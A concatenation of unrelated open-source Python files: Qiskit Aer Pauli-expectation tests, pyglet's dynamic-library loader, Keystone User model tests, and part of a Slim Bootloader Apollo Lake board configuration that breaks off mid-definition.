"""Pauli Change of Basis Expectation tests."""
def setUp(self) -> None:
super().setUp()
try:
from qiskit import Aer
self.seed = 97
self.backend = Aer.get_backend("aer_simulator")
q_instance = QuantumInstance(
self.backend, seed_simulator=self.seed, seed_transpiler=self.seed
)
self.sampler = CircuitSampler(q_instance, attach_results=True)
self.expect = AerPauliExpectation()
except Exception as ex: # pylint: disable=broad-except
self.skipTest(f"Aer doesn't appear to be installed. Error: '{str(ex)}'")
return
def test_pauli_expect_pair(self):
"""pauli expect pair test"""
op = Z ^ Z
# wvf = (Pl^Pl) + (Ze^Ze)
wvf = CX @ (H ^ I) @ Zero
converted_meas = self.expect.convert(~StateFn(op) @ wvf)
sampled = self.sampler.convert(converted_meas)
self.assertAlmostEqual(sampled.eval(), 0, delta=0.1)
def test_pauli_expect_single(self):
"""pauli expect single test"""
paulis = [Z, X, Y, I]
states = [Zero, One, Plus, Minus, S @ Plus, S @ Minus]
for pauli, state in itertools.product(paulis, states):
converted_meas = self.expect.convert(~StateFn(pauli) @ state)
matmulmean = state.adjoint().to_matrix() @ pauli.to_matrix() @ state.to_matrix()
sampled = self.sampler.convert(converted_meas)
self.assertAlmostEqual(sampled.eval(), matmulmean, delta=0.1)
def test_pauli_expect_op_vector(self):
"""pauli expect op vector test"""
paulis_op = ListOp([X, Y, Z, I])
converted_meas = self.expect.convert(~StateFn(paulis_op))
plus_mean = converted_meas @ Plus
sampled_plus = self.sampler.convert(plus_mean)
np.testing.assert_array_almost_equal(sampled_plus.eval(), [1, 0, 0, 1], decimal=1)
minus_mean = converted_meas @ Minus
sampled_minus = self.sampler.convert(minus_mean)
np.testing.assert_array_almost_equal(sampled_minus.eval(), [-1, 0, 0, 1], decimal=1)
zero_mean = converted_meas @ Zero
sampled_zero = self.sampler.convert(zero_mean)
np.testing.assert_array_almost_equal(sampled_zero.eval(), [0, 0, 1, 1], decimal=1)
sum_zero = (Plus + Minus) * (0.5 ** 0.5)
sum_zero_mean = converted_meas @ sum_zero
sampled_zero_mean = self.sampler.convert(sum_zero_mean)
# !!NOTE!!: Depolarizing channel (Sampling) means interference
# does not happen between circuits in sum, so expectation does
# not equal expectation for Zero!!
np.testing.assert_array_almost_equal(sampled_zero_mean.eval(), [0, 0, 0, 1])
def test_pauli_expect_state_vector(self):
"""pauli expect state vector test"""
states_op = ListOp([One, Zero, Plus, Minus])
paulis_op = X
converted_meas = self.expect.convert(~StateFn(paulis_op) @ states_op)
sampled = self.sampler.convert(converted_meas)
# Small test to see if execution results are accessible
for composed_op in sampled:
self.assertTrue(hasattr(composed_op[0], "execution_results"))
np.testing.assert_array_almost_equal(sampled.eval(), [0, 0, 1, -1], decimal=1)
def test_pauli_expect_op_vector_state_vector(self):
"""pauli expect op vector state vector test"""
paulis_op = ListOp([X, Y, Z, I])
states_op = ListOp([One, Zero, Plus, Minus])
valids = [
[+0, 0, 1, -1],
[+0, 0, 0, 0],
[-1, 1, 0, -0],
[+1, 1, 1, 1],
]
converted_meas = self.expect.convert(~StateFn(paulis_op) @ states_op)
sampled = self.sampler.convert(converted_meas)
np.testing.assert_array_almost_equal(sampled.eval(), valids, decimal=1)
def test_multi_representation_ops(self):
"""Test observables with mixed representations"""
mixed_ops = ListOp([X.to_matrix_op(), H, H + I, X])
converted_meas = self.expect.convert(~StateFn(mixed_ops))
plus_mean = converted_meas @ Plus
sampled_plus = self.sampler.convert(plus_mean)
np.testing.assert_array_almost_equal(
sampled_plus.eval(), [1, 0.5 ** 0.5, (1 + 0.5 ** 0.5), 1], decimal=1
)
@unittest.skip("Skip until https://github.com/Qiskit/qiskit-aer/issues/1249 is closed.")
def test_parameterized_qobj(self):
"""grouped pauli expectation test"""
two_qubit_h2 = (
(-1.052373245772859 * I ^ I)
+ (0.39793742484318045 * I ^ Z)
+ (-0.39793742484318045 * Z ^ I)
+ (-0.01128010425623538 * Z ^ Z)
+ (0.18093119978423156 * X ^ X)
)
aer_sampler = CircuitSampler(
self.sampler.quantum_instance, param_qobj=True, attach_results=True
)
ansatz = RealAmplitudes()
ansatz.num_qubits = 2
observable_meas = self.expect.convert(StateFn(two_qubit_h2, is_measurement=True))
ansatz_circuit_op = CircuitStateFn(ansatz)
expect_op = observable_meas.compose(ansatz_circuit_op).reduce()
def generate_parameters(num):
param_bindings = {}
for param in ansatz.parameters:
values = []
for _ in range(num):
values.append(np.random.rand())
param_bindings[param] = values
return param_bindings
def validate_sampler(ideal, sut, param_bindings):
expect_sampled = ideal.convert(expect_op, params=param_bindings).eval()
actual_sampled = sut.convert(expect_op, params=param_bindings).eval()
self.assertTrue(
np.allclose(actual_sampled, expect_sampled),
f"{actual_sampled} != {expect_sampled}",
)
def get_circuit_templates(sampler):
return sampler._transpiled_circ_templates
def validate_aer_binding_used(templates):
self.assertIsNotNone(templates)
def validate_aer_templates_reused(prev_templates, cur_templates):
self.assertIs(prev_templates, cur_templates)
validate_sampler(self.sampler, aer_sampler, generate_parameters(1))
cur_templates = get_circuit_templates(aer_sampler)
validate_aer_binding_used(cur_templates)
prev_templates = cur_templates
validate_sampler(self.sampler, aer_sampler, generate_parameters(2))
cur_templates = get_circuit_templates(aer_sampler)
validate_aer_templates_reused(prev_templates, cur_templates)
prev_templates = cur_templates
validate_sampler(self.sampler, aer_sampler, generate_parameters(2)) # same num of params
cur_templates = get_circuit_templates(aer_sampler)
validate_aer_templates_reused(prev_templates, cur_templates)
def test_pauli_expectation_param_qobj(self):
"""Test PauliExpectation with param_qobj"""
q_instance = QuantumInstance(
self.backend, seed_simulator=self.seed, seed_transpiler=self.seed, shots=10000
)
qubit_op = (0.1 * I ^ I) + (0.2 * I ^ Z) + (0.3 * Z ^ I) + (0.4 * Z ^ Z) + (0.5 * X ^ X)
ansatz = RealAmplitudes(qubit_op.num_qubits)
ansatz_circuit_op = CircuitStateFn(ansatz)
observable = PauliExpectation().convert(~StateFn(qubit_op))
expect_op = observable.compose(ansatz_circuit_op).reduce()
params1 = {}
params2 = {}
for param in ansatz.parameters:
params1[param] = [0]
params2[param] = [0, 0]
sampler1 = CircuitSampler(backend=q_instance, param_qobj=False)
samples1 = sampler1.convert(expect_op, params=params1)
val1 = np.real(samples1.eval())[0]
samples2 = sampler1.convert(expect_op, params=params2)
val2 = np.real(samples2.eval())
sampler2 = CircuitSampler(backend=q_instance, param_qobj=True)
samples3 = sampler2.convert(expect_op, params=params1)
val3 = np.real(samples3.eval())
samples4 = sampler2.convert(expect_op, params=params2)
val4 = np.real(samples4.eval())
np.testing.assert_array_almost_equal([val1] * 2, val2, decimal=2)
np.testing.assert_array_almost_equal(val1, val3, decimal=2)
np.testing.assert_array_almost_equal([val1] * 2, val4, decimal=2)
def test_list_pauli_sum(self):
"""Test AerPauliExpectation for ListOp[PauliSumOp]"""
test_op = ListOp([PauliSumOp.from_list([("XX", 1), ("ZI", 3), ("ZZ", 5)])])
observable = AerPauliExpectation().convert(~StateFn(test_op))
self.assertIsInstance(observable, ListOp)
self.assertIsInstance(observable[0], CircuitStateFn)
self.assertTrue(observable[0].is_measurement)
def test_expectation_with_coeff(self):
"""Test AerPauliExpectation with coefficients."""
with self.subTest("integer coefficients"):
exp = 3 * ~StateFn(X) @ (2 * Minus)
target = self.sampler.convert(self.expect.convert(exp)).eval()
self.assertEqual(target, -12)
with self.subTest("complex coefficients"):
exp = 3j * ~StateFn(X) @ (2j * Minus)
target = self.sampler.convert(self.expect.convert(exp)).eval()
self.assertEqual(target, -12j)
if __name__ == "__main__":
unittest.main()
|
py | 1a3f7c07497c87dc6f66cb1c5a3c00f92dfd67aa | # ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# Copyright (c) 2008-2020 pyglet contributors
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
"""Functions for loading dynamic libraries.
These extend and correct ctypes functions.
"""
import os
import re
import sys
import ctypes
import ctypes.util
import pyglet
_debug_lib = pyglet.options['debug_lib']
_debug_trace = pyglet.options['debug_trace']
_is_pyglet_doc_run = getattr(sys, "is_pyglet_doc_run", False)
if pyglet.options['search_local_libs']:
script_path = pyglet.resource.get_script_home()
cwd = os.getcwd()
_local_lib_paths = [script_path, os.path.join(script_path, 'lib'), os.path.join(cwd, 'lib')]
if pyglet.compat_platform == 'win32':
os.environ["PATH"] += os.pathsep + os.pathsep.join(_local_lib_paths)
else:
_local_lib_paths = None
class _TraceFunction:
def __init__(self, func):
self.__dict__['_func'] = func
def __str__(self):
return self._func.__name__
def __call__(self, *args, **kwargs):
return self._func(*args, **kwargs)
def __getattr__(self, name):
return getattr(self._func, name)
def __setattr__(self, name, value):
setattr(self._func, name, value)
class _TraceLibrary:
def __init__(self, library):
self._library = library
print(library)
def __getattr__(self, name):
func = getattr(self._library, name)
f = _TraceFunction(func)
return f
if _is_pyglet_doc_run:
class LibraryMock:
"""Mock library used when generating documentation."""
def __getattr__(self, name):
return LibraryMock()
def __setattr__(self, name, value):
pass
def __call__(self, *args, **kwargs):
return LibraryMock()
class LibraryLoader:
platform = pyglet.compat_platform
# this is only for library loading, don't include it in pyglet.platform
if platform == 'cygwin':
platform = 'win32'
def load_library(self, *names, **kwargs):
"""Find and load a library.
More than one name can be specified, they will be tried in order.
Platform-specific library names (given as kwargs) are tried first.
Raises ImportError if library is not found.
"""
if _is_pyglet_doc_run:
return LibraryMock()
if 'framework' in kwargs and self.platform == 'darwin':
return self.load_framework(kwargs['framework'])
if not names:
raise ImportError("No library name specified")
platform_names = kwargs.get(self.platform, [])
if isinstance(platform_names, str):
platform_names = [platform_names]
elif type(platform_names) is tuple:
platform_names = list(platform_names)
if self.platform.startswith('linux'):
for name in names:
libname = self.find_library(name)
platform_names.append(libname or 'lib%s.so' % name)
platform_names.extend(names)
for name in platform_names:
try:
lib = ctypes.cdll.LoadLibrary(name)
if _debug_lib:
print(name)
if _debug_trace:
lib = _TraceLibrary(lib)
return lib
except OSError as o:
path = self.find_library(name)
if path:
try:
lib = ctypes.cdll.LoadLibrary(path)
if _debug_lib:
print(path)
if _debug_trace:
lib = _TraceLibrary(lib)
return lib
except OSError:
pass
elif self.platform == "win32" and o.winerror != 126:
raise ImportError("Unexpected error loading library %s: %s" % (name, str(o)))
raise ImportError('Library "%s" not found.' % names[0])
def find_library(self, name):
return ctypes.util.find_library(name)
@staticmethod
def load_framework(name):
raise RuntimeError("Can't load framework on this platform.")
class MachOLibraryLoader(LibraryLoader):
def __init__(self):
if 'LD_LIBRARY_PATH' in os.environ:
self.ld_library_path = os.environ['LD_LIBRARY_PATH'].split(':')
else:
self.ld_library_path = []
if _local_lib_paths:
# search first for local libs
self.ld_library_path = _local_lib_paths + self.ld_library_path
os.environ['LD_LIBRARY_PATH'] = ':'.join(self.ld_library_path)
if 'DYLD_LIBRARY_PATH' in os.environ:
self.dyld_library_path = os.environ['DYLD_LIBRARY_PATH'].split(':')
else:
self.dyld_library_path = []
if 'DYLD_FALLBACK_LIBRARY_PATH' in os.environ:
self.dyld_fallback_library_path = os.environ['DYLD_FALLBACK_LIBRARY_PATH'].split(':')
else:
self.dyld_fallback_library_path = [os.path.expanduser('~/lib'), '/usr/local/lib', '/usr/lib']
def find_library(self, path):
"""Implements the dylib search as specified in Apple documentation:
http://developer.apple.com/library/content/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/DynamicLibraryUsageGuidelines.html
Before commencing the standard search, the method first checks
the bundle's ``Frameworks`` directory if the application is running
within a bundle (OS X .app).
"""
libname = os.path.basename(path)
search_path = []
if '.dylib' not in libname:
libname = 'lib' + libname + '.dylib'
# py2app support
if getattr(sys, 'frozen', None) == 'macosx_app' and 'RESOURCEPATH' in os.environ:
search_path.append(os.path.join(os.environ['RESOURCEPATH'],
'..',
'Frameworks',
libname))
# conda support
if os.environ.get('CONDA_PREFIX', False):
search_path.append(os.path.join(os.environ['CONDA_PREFIX'], 'lib', libname))
# pyinstaller.py sets sys.frozen to True, and puts dylibs in
# Contents/MacOS, which path pyinstaller puts in sys._MEIPASS
if (hasattr(sys, 'frozen') and hasattr(sys, '_MEIPASS') and
sys.frozen is True and pyglet.compat_platform == 'darwin'):
search_path.append(os.path.join(sys._MEIPASS, libname))
if '/' in path:
search_path.extend([os.path.join(p, libname) for p in self.dyld_library_path])
search_path.append(path)
search_path.extend([os.path.join(p, libname) for p in self.dyld_fallback_library_path])
else:
search_path.extend([os.path.join(p, libname) for p in self.ld_library_path])
search_path.extend([os.path.join(p, libname) for p in self.dyld_library_path])
search_path.append(path)
search_path.extend([os.path.join(p, libname) for p in self.dyld_fallback_library_path])
for path in search_path:
if os.path.exists(path):
return path
return None
@staticmethod
def load_framework(name):
path = ctypes.util.find_library(name)
# Hack for compatibility with macOS > 11.0
if path is None:
frameworks = {
'AGL': '/System/Library/Frameworks/AGL.framework/AGL',
'IOKit': '/System/Library/Frameworks/IOKit.framework/IOKit',
'OpenAL': '/System/Library/Frameworks/OpenAL.framework/OpenAL',
'OpenGL': '/System/Library/Frameworks/OpenGL.framework/OpenGL'
}
path = frameworks.get(name)
if path:
lib = ctypes.cdll.LoadLibrary(path)
if _debug_lib:
print(path)
if _debug_trace:
lib = _TraceLibrary(lib)
return lib
raise ImportError("Can't find framework %s." % name)
class LinuxLibraryLoader(LibraryLoader):
_ld_so_cache = None
_local_libs_cache = None
@staticmethod
def _find_libs(directories):
cache = {}
lib_re = re.compile(r'lib(.*)\.so(?:$|\.)')
for directory in directories:
try:
for file in os.listdir(directory):
match = lib_re.match(file)
if match:
# Index by filename
path = os.path.join(directory, file)
if file not in cache:
cache[file] = path
# Index by library name
library = match.group(1)
if library not in cache:
cache[library] = path
except OSError:
pass
return cache
def _create_ld_so_cache(self):
# Recreate search path followed by ld.so. This is going to be
# slow to build, and incorrect (ld.so uses ld.so.cache, which may
# not be up-to-date). Used only as fallback for distros without
# /sbin/ldconfig.
#
# We assume the DT_RPATH and DT_RUNPATH binary sections are omitted.
directories = []
try:
directories.extend(os.environ['LD_LIBRARY_PATH'].split(':'))
except KeyError:
pass
try:
with open('/etc/ld.so.conf') as fid:
directories.extend([dir.strip() for dir in fid])
except IOError:
pass
directories.extend(['/lib', '/usr/lib'])
self._ld_so_cache = self._find_libs(directories)
def find_library(self, path):
# search first for local libs
if _local_lib_paths:
if not self._local_libs_cache:
self._local_libs_cache = self._find_libs(_local_lib_paths)
if path in self._local_libs_cache:
return self._local_libs_cache[path]
# ctypes tries ldconfig, gcc and objdump. If none of these are
# present, we implement the ld-linux.so search path as described in
# the man page.
result = ctypes.util.find_library(path)
if result:
return result
if self._ld_so_cache is None:
self._create_ld_so_cache()
return self._ld_so_cache.get(path)
if pyglet.compat_platform == 'darwin':
loader = MachOLibraryLoader()
elif pyglet.compat_platform.startswith('linux'):
loader = LinuxLibraryLoader()
else:
loader = LibraryLoader()
load_library = loader.load_library
|
py | 1a3f7c4f83eafe11b94ed9229bdaf3d09094b064 | import json
from lxml import etree
import unittest2 as unittest
from keystone.models import User
from keystone.test import utils as testutils
class TestModelsUser(unittest.TestCase):
'''Unit tests for keystone/models.py:User class.'''
def test_user(self):
user = User()
self.assertEquals(str(user.__class__),
"<class 'keystone.models.User'>",
"user should be of instance "
"class keystone.models.User but instead "
"was '%s'" % str(user.__class__))
self.assertIsInstance(user, dict, "")
def test_user_static_properties(self):
user = User(id=1, name="the user", blank=None)
self.assertEquals(user.id, 1)
self.assertEquals(user.name, "the user")
self.assertRaises(AttributeError, getattr, user,
'some_bad_property')
def test_user_properties(self):
user = User(id=1, name="the user", blank=None)
user["dynamic"] = "test"
self.assertEquals(user["dynamic"], "test")
def test_user_json_serialization(self):
user = User(id=1, name="the user", blank=None)
user["dynamic"] = "test"
json_str = user.to_json()
d1 = json.loads(json_str)
d2 = json.loads('{"user": {"name": "the user", \
"id": 1, "dynamic": "test"}}')
self.assertDictEqual(d1, d2)
def test_user_xml_serialization(self):
user = User(id=1, name="the user", blank=None)
xml_str = user.to_xml()
self.assertTrue(testutils.XMLTools.xmlEqual(xml_str,
'<user name="the user" id="1"/>'))
def test_user_json_deserialization(self):
user = User.from_json('{"name": "the user", "id": 1}',
hints={"contract_attributes": ['id', 'name']})
self.assertIsInstance(user, User)
self.assertEquals(user.id, 1)
self.assertEquals(user.name, "the user")
def test_user_xml_deserialization(self):
user = User(id=1, name="the user", blank=None)
self.assertIsInstance(user, User)
def test_user_inspection(self):
user = User(id=1, name="the user", blank=None)
self.assertFalse(user.inspect())
def test_user_validation(self):
user = User(id=1, name="the user", blank=None)
self.assertTrue(user.validate())
if __name__ == '__main__':
unittest.main()
|
py | 1a3f7c7ebac358e36e7c43b36edd46a5b0269f29 | ## @file
# This file is used to provide board specific image information.
#
# Copyright (c) 2017 - 2020, Intel Corporation. All rights reserved.<BR>
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
##
# Import Modules
#
import os
import sys
sys.dont_write_bytecode = True
sys.path.append (os.path.join('..', '..'))
from BuildLoader import FLASH_MAP, BaseBoard, STITCH_OPS
from BuildLoader import IPP_CRYPTO_OPTIMIZATION_MASK, IPP_CRYPTO_ALG_MASK
#
# Temporary Memory Layout for APL
#
# FF000000 +--------------------------+
# | Stage1B |
# | (Decompressed) |
# FEF80000 +--------------------------+
# | Stage1 Heap/Stack |
# FEF70000 +--------------------------+
# | Not Used |
# +-------------+------------+
# | Free |
# | |------------|
# +-------------+ MRC NVS |
# | | |
# FEF40000 +- Stage1B -+------------+
# | Compressed | FSP Mem |
# FEF16000 | +------------+
# | | |
# FEF10000 --------------+------------+
# | N/A (Don't use) |
# FEF08000 +--------------------------+
# | Stage1A |
# FEF00000 +--------------------------+
#
class Board(BaseBoard):
def __init__(self, *args, **kwargs):
super(Board, self).__init__(*args, **kwargs)
self.VERINFO_IMAGE_ID = 'SB_APLI '
self.VERINFO_PROJ_MAJOR_VER = 1
self.VERINFO_PROJ_MINOR_VER = 0
self.VERINFO_SVN = 1
self.VERINFO_BUILD_DATE = '05/20/2018'
self.BOARD_NAME = 'apl'
self.BOARD_PKG_NAME = 'ApollolakeBoardPkg'
self.SILICON_PKG_NAME = 'ApollolakePkg'
self._PCI_ENUM_DOWNGRADE_PMEM64 = 1
self.PCI_IO_BASE = 0x00001000
self.PCI_MEM32_BASE = 0x80000000
self.PCI_MEM64_BASE = 0x400000000
self.FLASH_SIZE = 0x800000
self.FLASH_BASE = self.FLASH_LAYOUT_START - self.FLASH_SIZE
self.HAVE_VBT_BIN = 1
self.HAVE_VERIFIED_BOOT = 1
self.HAVE_MEASURED_BOOT = 0
self.HAVE_SEED_LIST = 0
self.HAVE_PSD_TABLE = 1
self.ENABLE_SMBIOS = 1
self.ENABLE_FSP_LOAD_IMAGE = 0
self.ENABLE_VTD = 1
self.ENABLE_FWU = 1
self.ENABLE_SPLASH = 1
self.ENABLE_FRAMEBUFFER_INIT = 1
self.ENABLE_GRUB_CONFIG = 1
self.ENABLE_DMA_PROTECTION = 0
# G9 for 384 | W7 Opt for SHA384| Ni Opt for SHA256| V8 Opt for SHA256
self.ENABLE_CRYPTO_SHA_OPT = IPP_CRYPTO_OPTIMIZATION_MASK['SHA256_NI']
# To enable source debug, set 1 to self.ENABLE_SOURCE_DEBUG
# self.ENABLE_SOURCE_DEBUG = 1
# Temporary skip Stage1A due to 32KB(IBBL) size limitation
# until library size optimization has done.
# If ENABLE_SOURCE_DEBUG is disabled, SKIP_STAGE1A_SOURCE_DEBUG will be ignored
self.SKIP_STAGE1A_SOURCE_DEBUG = 1
# BIT0:Serial BIT1:USB KB
# Support serial port input console by default
self.CONSOLE_IN_DEVICE_MASK = 0x00000001
# BIT0:Serial BIT1:GFX
self.CONSOLE_OUT_DEVICE_MASK = 0x00000001
# Mem | NVMe | Usb | Spi | Ufs | eMMC | SD | Sata
self.BOOT_MEDIA_SUPPORT_MASK = 0xBF
# EXT | FAT
self.FILE_SYSTEM_SUPPORT_MASK = 3
# Verify required minimum FSP version
self.MIN_FSP_REVISION = 0x01040301
# Verify FSP image ID. Empty string means skipping verification
self.FSP_IMAGE_ID = '$APLFSP$'
self.STAGE1A_SIZE = 0x00008000
self.STAGE1B_SIZE = 0x00035000
if self.ENABLE_SOURCE_DEBUG:
self.STAGE1B_SIZE += 0x2000
self.STAGE2_SIZE = 0x00032000
self.PAYLOAD_SIZE = 0x0001F000
if len(self._PAYLOAD_NAME.split(';')) > 1:
# EPAYLOAD is specified
self.EPAYLOAD_SIZE = 0x00130000
self.UEFI_VARIABLE_SIZE = 0x00040000
else:
# EPAYLOAD does not exist, create a dummy one
self.EPAYLOAD_SIZE = 0x1000
self.UEFI_VARIABLE_SIZE = 0x1000
if self.FSPDEBUG_MODE == 1:
self.STAGE1B_SIZE += 0x00009000
self.STAGE2_SIZE += 0x0000F000
self.STAGE1A_XIP = 0
self.STAGE1A_LOAD_BASE = 0xFEF00000
self.STAGE1B_XIP = 0
self.STAGE1B_LOAD_BASE = 0xFEF10000
self.STAGE1B_FD_BASE = 0xFEF80000
self.STAGE1B_FD_SIZE = 0x0006B000
if self.RELEASE_MODE == 0:
self.STAGE1B_FD_SIZE += 0x00002000
self.PAYLOAD_SIZE += 0x00005000
# For Stage2, it is always compressed.
# if STAGE2_LOAD_HIGH is 1, STAGE2_FD_BASE will be ignored
self.STAGE2_FD_BASE = 0x01000000
self.STAGE2_FD_SIZE = 0x00080000
self.STAGE2_LOAD_BASE = 0x00100000
self.STAGE1_STACK_SIZE = 0x00002000
self.STAGE1_DATA_SIZE = 0x0000E000
# Offset is relative to the temporary memory base 0xFEF00000
self.STAGE1_STACK_BASE_OFFSET = 0x00080000 - (self.STAGE1_STACK_SIZE + self.STAGE1_DATA_SIZE)
# To support large payload such as UEFI
self.LOADER_RSVD_MEM_SIZE = 0x00B8C000
self.PLD_RSVD_MEM_SIZE = 0x00500000
self.PLD_HEAP_SIZE = 0x04000000
self.FWUPDATE_SIZE = 0x00020000
self.CFGDATA_SIZE = 0x00004000
self.KEYHASH_SIZE = 0x00001000
self.CFG_DATABASE_SIZE = self.CFGDATA_SIZE
self.MRCDATA_SIZE = 0x00004000
self.VARIABLE_SIZE = 0x00002000
self.S3_DEBUG = 0
self.SBLRSVD_SIZE = 0x00001000
if len(self._PAYLOAD_NAME.split(';')) > 1:
self.SPI_IAS1_SIZE = 0x00001000
else:
self.SPI_IAS1_SIZE = 0x00150000
self._CFGDATA_INT_FILE = ['CfgData_Int_LeafHill.dlt']
self._CFGDATA_EXT_FILE = ['CfgData_Ext_Gpmrb.dlt', 'CfgData_Ext_Up2.dlt','CfgData_Ext_OxbHill.dlt','CfgData_Ext_MB3.dlt','CfgData_Ext_JuniperHill.dlt']
# If mulitple VBT table support is required, list them as:
# {VbtImageId1 : VbtFileName1, VbtImageId2 : VbtFileName2, ...}
# VbtImageId is ID to identify a VBT image. It is a UINT32 number to match
# the ImageId field in the VBT container.
# VbtFileName is the VBT file name. It needs to be located under platform
# VbtBin folder.
self._MULTI_VBT_FILE = {1:'Vbt.dat', 2:'Vbt_Up2.dat'}
def GetPlatformDsc (self):
dsc = {}
common_libs = [
'LoaderLib|Platform/$(BOARD_PKG_NAME)/Library/LoaderLib/LoaderLib.inf',
'SerialPortLib|Silicon/$(SILICON_PKG_NAME)/Library/SerialPortLib/SerialPortLib.inf',
'SocInfoLib|Silicon/$(SILICON_PKG_NAME)/Library/SocInfoLib/SocInfoLib.inf',
'PlatformHookLib|Silicon/$(SILICON_PKG_NAME)/Library/PlatformHookLib/PlatformHookLib.inf',
'ScSbiAccessLib|Silicon/$(SILICON_PKG_NAME)/Library/ScSbiAccessLib/ScSbiAccessLib.inf',
'GpioLib|Silicon/$(SILICON_PKG_NAME)/Library/GpioLib/GpioLib.inf',
'PchSpiLib|Silicon/CommonSocPkg/Library/PchSpiLib/PchSpiLib.inf',
'SpiFlashLib|Silicon/CommonSocPkg/Library/SpiFlashLib/SpiFlashLib.inf',
'IgdOpRegionLib|Silicon/$(SILICON_PKG_NAME)/Library/IgdOpRegionLib/IgdOpRegionLib.inf',
'IocIpcLib|Platform/$(BOARD_PKG_NAME)/Library/IocIpcLib/IocIpcLib.inf',
'BootGuardLib|Silicon/$(SILICON_PKG_NAME)/Library/BootGuardLib20/BootGuardLib20.inf',
'HeciLib|Silicon/ApollolakePkg/Library/HeciLib/HeciLib.inf',
'PsdLib|Silicon/ApollolakePkg/Library/PsdLib/PsdLib.inf',
'ShellExtensionLib|Platform/$(BOARD_PKG_NAME)/Library/ShellExtensionLib/ShellExtensionLib.inf',
'BootMediaLib|Silicon/ApollolakePkg/Library/BootMediaLib/BootMediaLib.inf',
'FlashDescriptorLib|Silicon/ApollolakePkg/Library/FlashDescriptorLib/FlashDescriptorLib.inf',
'VtdLib|Silicon/$(SILICON_PKG_NAME)/Library/VtdLib/VtdLib.inf',
'SmbusLib|Silicon/$(SILICON_PKG_NAME)/Library/SmbusLib/SmbusLib.inf',
'HdaLib|Platform/$(BOARD_PKG_NAME)/Library/HdaLib/HdaLib.inf',
'VtdPmrLib|Silicon/CommonSocPkg/Library/VtdPmrLib/VtdPmrLib.inf',
'BaseIpcLib|Silicon/$(SILICON_PKG_NAME)/Library/BaseIpcLib/BaseIpcLib.inf'
]
dsc['LibraryClasses.%s' % self.BUILD_ARCH] = common_libs
return dsc
def GetFlashMapList (self):
img_list = self.GetImageLayout ()
comp_list = []
offset = 0
# Skip Stitch_IPAD and Stitch_OPAD for flash map
for img in img_list[2:][::-1]:
child = img[1][0]
if child[3] & STITCH_OPS.MODE_FILE_IGNOR:
continue
bname = os.path.splitext(child[0])[0]
comp = {'name':child[0], 'bname':bname, 'offset':offset, 'size':child[2], 'flag': FLASH_MAP.FLASH_MAP_DESC_FLAGS['COMPRESSED'] if child[1] else 0}
if bname in ['STAGE1A', 'STAGE1B', 'STAGE2', 'FWUPDATE', 'CFGDATA', 'MRCDATA', 'PAYLOAD', 'VARIABLE']:
comp['flag'] |= FLASH_MAP.FLASH_MAP_DESC_FLAGS['REDUNDANT']
else:
comp['flag'] |= FLASH_MAP.FLASH_MAP_DESC_FLAGS['NON_REDUNDANT']
comp_list.append (comp)
offset += child[2]
flag = FLASH_MAP.FLASH_MAP_DESC_FLAGS['REDUNDANT']
comp_list.append ({'name':'SBLRSVD.bin','bname':'SBLRSVD','offset':0, 'size':self.SBLRSVD_SIZE, 'flag': FLASH_MAP.FLASH_MAP_DESC_FLAGS['NON_REDUNDANT']})
comp_list.append ({'name':'BPM.bin', 'bname':'BPM', 'offset':0, 'size':0, 'flag': flag})
return comp_list[::-1]
def GetOutputImages (self):
# define extra images that will be copied to output folder
img_list = ['SlimBootloader.txt',
'CfgDataStitch.py',
'CfgDataDef.yaml',
'CfgDataInt.bin'
]
return img_list
def GetKeyHashList (self):
# Define a set of new key used for different purposes
# The key is either key id or public key PEM format or private key PEM format
pub_key_list = [
(
# Key for verifying Config data blob
HASH_USAGE['PUBKEY_CFG_DATA'],
'KEY_ID_CFGDATA' + '_' + self._RSA_SIGN_TYPE
),
(
# Key for verifying firmware update
HASH_USAGE['PUBKEY_FWU'],
'KEY_ID_FIRMWAREUPDATE' + '_' + self._RSA_SIGN_TYPE
),
(
# Key for verifying container header
HASH_USAGE['PUBKEY_CONT_DEF'],
'KEY_ID_CONTAINER' + '_' + self._RSA_SIGN_TYPE
),
(
# key for veryfying OS image.
HASH_USAGE['PUBKEY_OS'],
'KEY_ID_OS1_PUBLIC' + '_' + self._RSA_SIGN_TYPE
),
]
return pub_key_list
def GetImageLayout (self):
ias1_flag = 0 if self.SPI_IAS1_SIZE > 0 else STITCH_OPS.MODE_FILE_IGNOR
fwu_flag = 0 if self.ENABLE_FWU else STITCH_OPS.MODE_FILE_IGNOR
img_list = []
img_list.extend ([
# Padding to ensure all other components in OBB partition will be aligned at 4KB boundary
# 0xB00 assumes (IBBP.man, BPM.met) + (IPAD, IBBL, IBBM, OBB, FWUP, CFGD, PLD, VAR, MRCD) in BpdtIBB
# 0x180 assumes (OPAD, PROV, EPLD) in BpdtOBB
# If more files are added, the offset needs to be adjusted accordingly
('Stitch_IPAD.bin', [
('PADDING.bin', '', 0xB00, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_OPAD.bin', [
